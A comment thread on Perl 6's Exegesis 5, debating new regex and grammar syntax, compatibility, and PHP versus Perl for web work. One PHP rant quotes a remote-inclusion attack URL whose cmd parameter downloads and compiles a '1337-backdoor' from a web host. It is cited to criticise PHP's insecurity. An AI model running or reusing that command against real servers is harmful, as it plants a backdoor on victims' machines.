Damian Conway Publishes Exegesis 5
prostoalex writes "Come gather round Mongers, whatever you code,
And admit that your forehead's about to explode,
'Cos Perl patterns induce complete brain overload,
If there's source code you should be maintainin',
Then you better start learnin' Perl 6 patterns soon,
For the regexes, they are a-changin'.
This remix of Bob Dylan serves as an epigraph to Exegesis 5."
-Don
Take a look and feel free: http://www.PieMenu.com
I was excited for Perl 6 when it was first starting out; then I started reading about all the stuff that is going to change, and got worried. Now, after reading this, I've come to the conclusion that I am sticking with Perl 5. As for my Web stuff, I'm finally taking the plunge and learning PHP. Perl 6 is starting to become a completely different language, all my stuff works now, and I don't feel like porting.
Objects in the blog are closer then they ap
You'll still be able to use Perl5 regexes by indicating a special flag to the regex engine. So you don't have to jump right in from the start. But from reading Apocalypse 5, Perl6 regexes look to be much, much cooler. So you'll probably want to learn them anyway.
--
Promoting critical thinking since 1994.
Bob Dylan rolling in his grave knocked over my drink!
Oh, wait, he's not dead yet.
Carry on . . .
----------
I am an expert in electricity. My father held the chair of applied electricity at the state prison.
I know guys who can regex in their sleep, and they've been using mostly compatible syntax for YEARS! This new stuff looks completely different, and if Perl isn't going to be backwards compatible, I foresee a huge backlash, or an AnotherGNUPerl fork or something. (AGP is taken... doh)
It's important to allow people to use existing skillsets while expanding into the new syntax.
Ah slashdot, the only place on earth where regexes are "cool" and a bad Weird Al-like parody of a Bob Dylan song is a "remix".
sig:
See the "..for smart people" banners Wired runs here? Look elsewhere guys.
CPAN is a powerful resource. If all those modules get left behind, I fear we may end up with a more eloquent language in Perl 6 but with substantially less usability.
Damian was illustrating advanced concepts in this article. Things are not going to get more complicated if you are a mid level perl programmer and never cared about zero-width positive look-behind assertions. Other good news is that perl6 is not expected to be production ready for at least 4 years; you have plenty of time to become a perl wizard.
couldn't they have been gentler? However, if it lets me handle HTML easily, without having to learn all kinds of packages that do lots of things I don't need, then I'm all for it.
John Roth
Watch that speed limit sign on the learning curve!
Some of this will be good for everyone. Some of it some of you won't like, but a lot of it you will. Give Perl 6 a chance, and don't react as if we've shot your pet.
- Why is Perl changing so much?!
Because it needs to. Perl is the legacy of something like 15 years of development and evolution. It started as a simple text processing system, and is now used in every field of endeavor where computers are used. There are some old things that needed to go, some new things that were needed, and generally a need to re-examine the way "stuff" was done.
- But what about my programs? Why break them?!
Perl 6 is two things (at least): a parser for Perl 6 and a back-end virtual machine, much like Java or C#. One of the design criteria for the release of Perl 6 is a Perl 5 compatible parser front-end that outputs Perl 6 virtual machine bytecode. This means that your Perl 5 programs will run with no modification in a Perl 6 environment (or at most a path change to the interpreter; that much is still under some debate).
- Why would you want to break compatibility with other regular expression engines?
Remember that Perl has been leading the pack in terms of regular expression handling for a long time. Now Perl is moving beyond regular expressions to grammar specification. This is a good thing, as long as the benefits of regular expressions are preserved.
-- Sorry, I can't think of anything funny to say here.
I only had time to skim the article, and anyway it would take anyone a while to absorb all that code. Here's the short summary:
Regexes in Perl have accumulated too much cruft to be called regular expressions anymore. So now they're full grammars.
That's right. Now you can pattern match with a very readable grammar syntax that is easily decorated with Perl code to do parsing. YACC for Perl. You can find packages for this on CPAN, but this is integrated with the language.
No whining about the bad old days of Perl regex syntax for me... now I'm actually excited by the prospect of needing to buy a new llama book.
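For anyone who wants a feel for the "named rules that build on each other" idea before Perl 6 ships, here is a minimal sketch in Python rather than Perl 6. The rule names and the `<name>` reference notation are made up for illustration and are not the Exegesis syntax. It only expands non-recursive rules into one big regex, which is a much weaker thing than the grammars the article describes.

```python
import re

# Hypothetical rules: each one is a regex fragment that may refer to
# another rule by writing <name>.
RULES = {
    "digit": r"[0-9]",
    "number": r"<digit>+",
    "term": r"<number>(?:\s*[*/]\s*<number>)*",
    "expr": r"<term>(?:\s*[+-]\s*<term>)*",
}

def expand(name):
    """Recursively replace every <rule> reference with a non-capturing group."""
    return re.sub(
        r"<(\w+)>",
        lambda m: "(?:" + expand(m.group(1)) + ")",
        RULES[name],
    )

EXPR = re.compile(expand("expr"))

print(bool(EXPR.fullmatch("12 + 3*4")))   # a well-formed expression
print(bool(EXPR.fullmatch("12 + * 4")))   # an operator with no operand
```

The point is only that small named pieces stay readable where one monolithic regex would not. Recursion, captures per rule and embedded code are exactly the parts this sketch leaves out.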
Most of the Perl 6 changes seem to be for the better, but two in particular gall me: changing arrow to dot, and changing ARGV to ARGS.
The rationale for losing arrow was that it made more operators available, and that it was more familiar to users of other OO languages. I suppose it's also easier to type; not only one less character, but no shift key. But it seemed like a change just to force old programs to be rewritten.
And ARGV? Simply because it was supposed to be old fashioned, unfamiliar, not obvious. BAH. Change for no reason other than to commit breakage and force a rewrite.
I will probably switch as time goes by, but to Ruby rather than Perl 6. If I'm going to have to touch every file, I may as well do it the right way.
Infuriate left and right
People--especially FUDchunkers--are missing the most important points:
Almost all of the most useful Perl5 code of today will be runnable by Perl6 tomorrow: the compiler will fall back to perl5 and the VM is language neutral (even more so than .NET, it would seem).
In addition to running most perl5 modules as-is, Perl6 matching rules will have a perl5 backwards compatibility mode built in, so you can continue using the Perl5 regular expressions you know and love from Perl, Java, and everywhere else that's adopted them, as needed in Perl6 code.
Yes, Perl6 is a rewrite and introduces a lot of deep CS concepts and new syntax, but some care is being taken to assure that most Perl5 code will be runnable as is, while people learn about the power of some of the advanced tools Perl6 will provide.
Please Don't Panic (or incite others to): the Apocalypses and Exegeses are technical documents; they are not meant to be smooth, easy reading or to reassure today's perlers that their hard-won skills will be useful. They're meant to describe what's new and different and usually why. Don't be scared by the new and different. Just as with existing Perl, you should be able to adopt the powerful new concepts and syntax as you need to, without having to swallow it whole or unlearn everything you already know.
Perl6 will be stunningly more powerful, expressive, and provide (optionally) the safety features required for average coders to implement large systems while letting experts use extremely powerful tools like closures, continuations, intricate pattern matching that have mostly been accessible in academic languages to this point. And it will still allow convenient scripts to be generated if that's what you need to do.
Remember folks, other languages can make shitty code smell nice, but it's still shitty code and you wouldn't want to eat^Wmaintain it.
- Barrie
Someone asked this very question at Damian's Perl 6 talk at YAPC. According to Damian, the "use CGI" (or whichever package) construct will tell the Perl 6 interpreter that the package being "use"'d is Perl 5 code. So the CPAN modules will still work.
Hopelessly pedantic since 1963.
Because star can mean 0 to infinity. You are confusing "*" with "+". Plus would have meant 1 to infinity.
@matches = $str =~ m:any/ah*/; # returns "ahhh", "ahh", "ah", "a"
@matches = $str =~ m:any/ah+/; # returns "ahhh", "ahh", "ah"
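If you want to check the star-versus-plus difference today, here is a rough Python sketch. It is not Perl 6 and does not implement `m:any`; it just tries every prefix of the string, which is enough to reproduce the two lists above for a pattern anchored at the start. The helper name `all_prefix_matches` is made up for this example.

```python
import re

def all_prefix_matches(pattern, text):
    """Return every prefix of text that the whole pattern matches, longest first."""
    return [
        text[:end]
        for end in range(len(text), -1, -1)
        if re.fullmatch(pattern, text[:end])
    ]

print(all_prefix_matches(r"ah*", "ahhh"))  # ['ahhh', 'ahh', 'ah', 'a']
print(all_prefix_matches(r"ah+", "ahhh"))  # ['ahhh', 'ahh', 'ah']
```

The bare "a" shows up only for `*`, because zero repetitions of "h" are allowed there and not for `+`.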
I first used perl back in version 3, something like 12 years ago. I first really learned perl, v4, about 9 years ago. It did everything I ever needed.
Then, perl 5 came out. I didn't bother "learning" it -- that is, I've been using it, and when I really need to, I've used some perl 5 features, but I've learned them as I go (by example), and I know I'm not really using the full capabilities. (Plus, though I know what I'm doing, I don't always know what to call what I'm doing -- I got stumped the other day when someone asked me how to do pointers in perl. I drew a blank, not making the connection to all the weird hash magic I'd been doing lately. But I digress.)
Anyway, the bottom line of this is: Perl 5 looked interesting, but like more of the same, and wasn't really compelling for me to buckle down and learn all the new features. Perl 6, on the other hand, scares me. In a good way.
Here's a page-by-page description of how I read the article:
- Page 1: Hm. Looks like they're describing a grammar with regex. Cool.
- Page 2: I can intuitively match against a set of strings! Wild. These strings can be expressions themselves? Even better!
- Page 3: It's a grammar. A full, honkin, real, honest-to-goodness grammar. That I can match against. Are those angels I hear singing?
- Page 4: <head explodes>
- Page 5: <drools>
Seriously, though, I was concerned at first that I'd have to learn something new, crazy, and difficult (given how screwed-up much of perl 5 has seemed, at times). I'm impressed. I'm very impressed. Yes, I have to learn something new and crazy, but it's not at all difficult. In fact, I think I've already learned it.
The power that this new system holds, and, more importantly, the simplicity of it all, is amazing.
So, unlike some other posters, I can't wait for Perl 6. When does this come out, again? And, more importantly, when can I buy the new book?
(also, was I the only one who expected, after the demonstration of matching method invocations, to be told that the entire source code for perl6 was just one giant RegEx/Grammar?)
Gotta love the sense of humour. After describing one, two, and three colon rules (read the article, page three), they get to the potential fourth...
Basically the new rule (not 'regex') syntax seems to be bent on destroying Perl's "Line noise with a purpose" reputation...
"The best argument against democracy is a five minute chat with the average voter."
--Winston Churchill
From the exegesis:
The first thing to note is that, like a Perl 5 qr, a Perl 6 rx can take (almost) any delimiters we choose. The $hunk pattern uses {...}, but we could have used:
rx/pattern/ # Standard
rx[pattern] # Alternative bracket-delimiter style
rx<pattern> # Alternative bracket-delimiter style
rx«forme» # Délimiteurs très chic
rx>pattern< # Inverted bracketing is allowed too (!)
rx»Muster« # Begrenzungen im korrekten Auftrag
rx!pattern! # Excited
rx=pattern= # Unusual
rx?pattern? # No special meaning in Perl 6
rx#pattern# # Careful with these: they disable internal comments
Are these allowed for the sole purpose of creating new T-Shirt patterns?
Note: this is probably going to be horrendously biased because 99% of the PHP stuff I do is maintaining and customizing a vBulletin. For those who have ever dealt with this piece of crapware I'll say nothing more. Suffice it to say that if you run diff on, say, newthread.php and newreply.php the output is disturbingly short.
t _path=http://my.webserver.com/&phpEx=txt&cmd=lynx+ -source+http://my.webserver.com/1337-backdoor.c+|+ gcc+-o+/tmp/1337-backdoor or something like that then it's quite clear that things are getting absolutely fucking ridiculous. In fact the PHP team have realized this and forced you to use $HTTP_POST_VARS or whatever other four-mile-long identifier to get at your vars (oh, sorry it's $_POST now) ... well, at least if php.ini says so. Which you can't count on anyway so I always write a little routine to bomb out the global namespace (except for the superglobals) at the start of each of my scripts. Stupid and unnecessary.
... need I go on?
Look, I'm sorry, but exactly what was supposed to be great about PHP? The fact that you can easily embed it in HTML code, that it integrates cleanly with MySQL, and that you can pass args to it easily. Let us demolish each of these in sequence.
* HTML embedding - Ever heard of MVC? I'm sorry, but if you compare something like this:
<ul>
<?php foreach ($users as $user) { ?>
<li><a href="user.php?userid=<?php echo $user->userid ?>"><?php echo $user->username ?></a></li>
<?php } ?>
</ul>
and, say, the equiv in Template Toolkit:
<ul>
[% FOREACH user = users %]
<li><a href="user.pl?userid=[% user.userid %]">[% user.username %]</a></li>
[% END %]
</ul>
now you tell me which looks neater? HTML-like templating syntax just looks dire because it all falls apart when you have to include stuff inside attributes. Not only is it ugly but it's unmaintainable. Want to skin your site in PHP? forget it. Want to skin it in perl/TT/CPAN templating engine of your choice? no problem, just supply a different base path to your template engine of choice. Of course most PHP coders have realized this so they've created their own templating engine, or use something like Smarty and just wrap everything in one great big PHP tag. Which quite frankly just defeats the entire point.
* Argument passing - this is hellish. Anything that comes in in a query string, cookie or post variable immediately enters your global namespace, where your often CRITICAL state variables are - hope you initialized them! I can't tell you how many times I got exploited by some stupid XSS exploit or the totally useless ability of include() to pull stuff in over HTTP. It's bad enough when a script kiddie just needs a unix system and the ability to use a compiler to root a machine but when 'h4xx0ring' can be done just by typing http://phpbb.mysite.com/includes/db.php?phpbb_roo
* MySQL integration - eh?! I'm sorry but I HATE the PHP MySQL API. The error handling is a joke so most people write their own wrappers around MySQL to catch errors and deal with them (that or it's back to checking the return value of every little thing. Thanks but if I wanted to do that I'd program in C). That and don't get me started on slashing. php.ini is set up so that your incoming variables may or may not get slashed. Again, you can't influence this or count on it if you've got shared hosting of some sort so either you've got to manually strip all the slashes out again or put them in - in which case you either have to deslashify something if you're using it internally or slashify it when passing it to mysql_query() to make sure someone doesn't take a great big shit all over your SQL. And that's if you're using MySQL. If you're using Postgres, there's a different API, and if you're using Oracle then there's a third. The fact that there are TWO different database abstraction systems built into the core of PHP (DBx and ODBC) and then some in PEAR shows that something is really horribly wrong.
Now compare to Perl DBI or Java JDBC or anything else which actually has a sane DB access API.
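use Carp qw(confess);

my $userid;
eval {
    # Assumes $dbh was opened with RaiseError => 1, so DBI failures die and land in $@.
    my $sth = $dbh->prepare('SELECT userid FROM user WHERE username = ?');
    $sth->execute($username);    # the placeholder takes care of quoting
    ($userid) = $sth->fetchrow_array;
};
if ($@) { confess "SQL Error: $@"; }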
which in PHP looks like
// Escape the value by hand unless magic quotes already did it.
if (!get_magic_quotes_gpc()) {
    $username = addslashes($username);
}
$q = mysql_query("SELECT userid FROM user WHERE username = '$username'")
    or die("Query failed: " . mysql_error());
if ($r = mysql_fetch_row($q)) {
    $userid = $r[0];
}
I know which one I prefer. That and let's not forget the fact that every time you access a page, that page is parsed, its dependencies are parsed, initialization is performed, and then it handles your request. Also the standard library that comes with it is cack - everything is in the global namespace, there's no object orientation at all, parts of it look like the C standard library's been retrofitted into it because the designers were too damn lazy, it's inconsistent, there are several conflicting ways of doing everything and it's so badly designed that you're usually working AGAINST it rather than with it. (Want to slurp a file? Well, you can use the file() command to make an array of lines, which you can join together again, or you can use readfile() which sends a file directly to the client, however you can get round that by using output buffering to capture it. Or you can use fopen() and the related commands to open the file, find its size, read it into a scalar then close it again. Aargh!)
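The placeholder style in the DBI snippet is not Perl-specific. As a rough illustration, here is the same lookup sketched with Python's built-in sqlite3 module. The in-memory database, the `users` table and the `find_userid` helper are assumptions made up for this example, not anything from the posts above.

```python
import sqlite3

def find_userid(conn, username):
    """Look up a user id with a bound parameter instead of string interpolation."""
    row = conn.execute(
        "SELECT userid FROM users WHERE username = ?",
        (username,),
    ).fetchone()
    return row[0] if row else None

# Hypothetical throwaway database so the sketch runs on its own.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (userid INTEGER PRIMARY KEY, username TEXT)")
conn.execute("INSERT INTO users (username) VALUES (?)", ("alice",))

print(find_userid(conn, "alice"))
# A classic injection string is treated as plain data and matches nobody.
print(find_userid(conn, "x' OR '1'='1"))
```

Because the value never becomes part of the SQL text, there is nothing to slash or unslash, which is the whole complaint about the hand-escaped version.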
Now, look, I must admit Perl isn't great either. mod_perl is fast as lightning but it's got a ton of idiosyncrasies of its own (mainly in the way of including things, e.g. include paths, namespaces, etc.) and a lot of weird side-effects that are far from obvious and get in the way most of the time. I've written my own mini-wrapper around it that irons most of it out but it's still quite a pain.
As for PHP though, it does have its place, but remember what PHP stands for - PHP Hypertext PREPROCESSOR (I think). As SSI on steroids with some ability to interface with MySQL, it's a great system. But writing things like messageboards or shopping carts or portals in PHP is sheer lunacy. I've managed a PhpBB and a vBulletin as well as writing a mini news system that integrates with vB so maybe my experience isn't that great and someone ought to hit me with a clue-by-four. But if you can, please do because from what I've seen I find it very hard to like this language.
Because I can't pronounce Exegesis. I can pronounce Perl.
You are upset that Perl 6 is changing significantly enough that you feel it could be classified as a different language. And you don't want to learn a new language so to solve your dilemma you are going to learn a different language? :)
but without the S
-c
I have discovered a truly remarkable proof which this margin is too small to contain.
Things are being taken in order. Each Apocalypse corresponds to a chapter in Programming Perl 3e. We'll get to objects, never fear. They're just not next.
I fail to see why people feel that Perl and Ruby need to compete. Both can happily live side by side, and are not difficult to learn (at least the basics).
Learn both. They both have good points, and bad. I'd love an easier OO model in Perl5, but I'd also like more control over scoping in Ruby. The Ruby and Perl development communities are both listening to each other, from what I've seen, and drawing on their shared and unique experiences to further both languages. Why shouldn't the users of these languages do the same?
RE: * HTML embedding
You can also do this:
<? foreach ($users as $user)
{
include "templates/user/usertemplate.php";
}
?>
Then usertemplate.php contains
<li><a href="user.php?userid=<?= $user->userid ?>"><?= $user->username ?></a></li>
or
<? echo "<li><a href=\"user.php?userid={$user->userid}\">{$user->username}</a></li>"; ?>
The trick is if you tuck most (or all) of your html in the templates directory then you can have skinning. Just make multiple templates directories and keep track of which one you're pulling the content from. This forces you to split your html from your objects, and as a bonus you get more code reuse. Your object's html templates are neatly tucked away in their own directories.
RE: * Argument passing
Turn off register_globals and use $_REQUEST and the other superglobals to do what you need. Never trust user input, yadda yadda. This has been a weakness in the past, but now it's a bit harder to get burned. I shot myself in the foot a couple times and had to learn how to deal with this stuff. PHP is a newbie friendly language, but secure PHP takes some experience to get right.
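The same habit, sketched outside PHP: pull only the parameters you expect out of the request instead of letting everything land in your variables. This is a minimal Python illustration. The `read_params` helper and the `is_admin` flag are hypothetical names for this example only.

```python
from urllib.parse import parse_qs

def read_params(query_string, allowed):
    """Return only the whitelisted parameters, taking the first value of each."""
    parsed = parse_qs(query_string)
    return {name: parsed[name][0] for name in allowed if name in parsed}

is_admin = False   # internal state, never set from the request

# The request tries to smuggle in is_admin=1; only userid is accepted.
params = read_params("userid=42&is_admin=1", allowed={"userid"})
print(params)
print(is_admin)
```

Values that come through are still untrusted strings, so they need validating before use. The whitelist only stops the request from overwriting state it was never meant to touch.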
RE: * MySQL integration
Agreed. About this time last year I finally rolled my own DB wrapper that does what I need. My gripe with most abstraction layers is that they may claim to be DB independent, but cater to the lowest common denominator: mysql. Sorry, but if I'm using a "real" database I'm going to break out the stored procedures, transactions and more. If I get to use stored procedures, then my overall approach is going to change enough to break the abstraction layer. Things may have improved, but the last time I looked at it I went with the db specific functions. I'd like to see some improvement here.
More notes:
As far as the 'parse, parse, reparse and initialize' cycle, you can alleviate some of that with caching. I've rolled functions to do this by output buffering entire pages (or significant includes), placing them on disk or in the database and serving those to the users. It depends on how often you update your site, but for fairly static pages it works OK. You can also break out the Zend cache or other products if you want to 'do it right'.
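Roughly what that kind of page cache boils down to, sketched in Python with an in-memory dict standing in for the disk or database store. The `PageCache` class, its `ttl_seconds` parameter and the render function are made up for illustration; this is not the Zend cache or any PHP API.

```python
import time

class PageCache:
    """Keep rendered pages in memory and reuse them until they are ttl_seconds old."""

    def __init__(self, ttl_seconds, clock=time.monotonic):
        self._ttl = ttl_seconds
        self._clock = clock      # injectable so the cache can be tested without sleeping
        self._entries = {}       # key -> (time stored, rendered page)

    def get(self, key, render):
        """Return the cached page for key, calling render() only if it is missing or stale."""
        now = self._clock()
        entry = self._entries.get(key)
        if entry is not None and now - entry[0] < self._ttl:
            return entry[1]
        page = render()
        self._entries[key] = (now, page)
        return page


calls = []

def render_front_page():
    calls.append(1)              # count how often the expensive work really runs
    return "<html>front page</html>"

cache = PageCache(ttl_seconds=60)
first = cache.get("/", render_front_page)
second = cache.get("/", render_front_page)   # served from the cache, no second render
print(len(calls))
```

How long the TTL should be depends on how often the site changes, which is the trade-off described above.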
I don't see a problem with three different ways to open a file. Each one has a use and a historical reason for existing. Each one also gets the job done for the general case. Yes the namespace is a bit cluttered but the docs are very good. It seems like a design goal for PHP has been to wrap every useful library they can. This brings in a bunch of the C style file operations. Then you get the design goal to make tools to build webpages. That gives you output buffering tricks and so on. Learning to deal with this is all a part of PHP.
Just because PHP makes it easy for a 'non-programmer' to submit a form to a database, it doesn't mean that it is an easy language to use for large projects. Maintaining bad PHP is hell and refactoring can be problematic. However, I do think PHP is appropriate for portals, message boards, and online catalogs. You just need to take the right approach: object orientation (or good procedural libraries), templates, php.ini tweaking, coding standards and so on. It's not the easiest language to scale up, but it can be done. The problem is that it is such an easy language to do little things in that people screw up when they do big things with it. Just like Perl.
was I the only one who expected, after the demonstration of matching method invocations, to be told that the entire source code for perl6 was just one giant RegEx/Grammar?
That's correct, and has been Larry's plan since the beginning. The Perl6 eval will be a rule like so:
if /^<$code <perlgrammar>>$/ {
    Parrot.execute $code.bytecode;
}
Add command-line handling and that's your /usr/bin/perl in a nutshell.
Replying to the question just once:
"What more control could you want over scoping in Ruby?"
Oh, Ruby's good at this. But going back to Perl the last several months for reasons including Parrot, I've come to appreciate "my". While I generally like how Ruby handles scoping, every once in a while there's a problem where I think "everything else makes Ruby a good fit to this, but there's a really nifty Perl trick with my that I could apply here."
But because they're sooooo smart, they write things like this:
In other words, a raw variable in a Perl 6 pattern is matched as if it was a Perl 5 regex in which the interpolation had been quotemeta'd and then placed in a pair of non-capturing parentheses.
OK. OOOOK. I'm really looking forward to Perl 6 For Dummies. Now pardon me while I go back to reading something easy, like differential geometry.
But seriously, what really excites me about Perl 6 is Parrot. It's going to be just ultra-cool to be able to link to Python and Ruby (and C) with no fuss and no muss. To me, the rest is just syntactic sugar.
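For what it's worth, the quoted sentence about raw variables is less scary in code. Here is a small Python sketch of the same idea: escape the interpolated text so it matches literally, then wrap it in a non-capturing group so a following quantifier applies to the whole thing. `re.escape` plays the role of Perl 5's quotemeta here, and the helper name `interpolate_literal` is made up for this example.

```python
import re

def interpolate_literal(fragment):
    """Escape fragment so it matches literally, then group it without capturing."""
    return "(?:" + re.escape(fragment) + ")"

# The "+" applies to the whole literal "a.b", not just to the final "b".
pattern = re.compile(interpolate_literal("a.b") + "+")

print(bool(pattern.fullmatch("a.ba.b")))   # two literal copies of a.b
print(bool(pattern.fullmatch("axb")))      # the dot is literal, not a wildcard
```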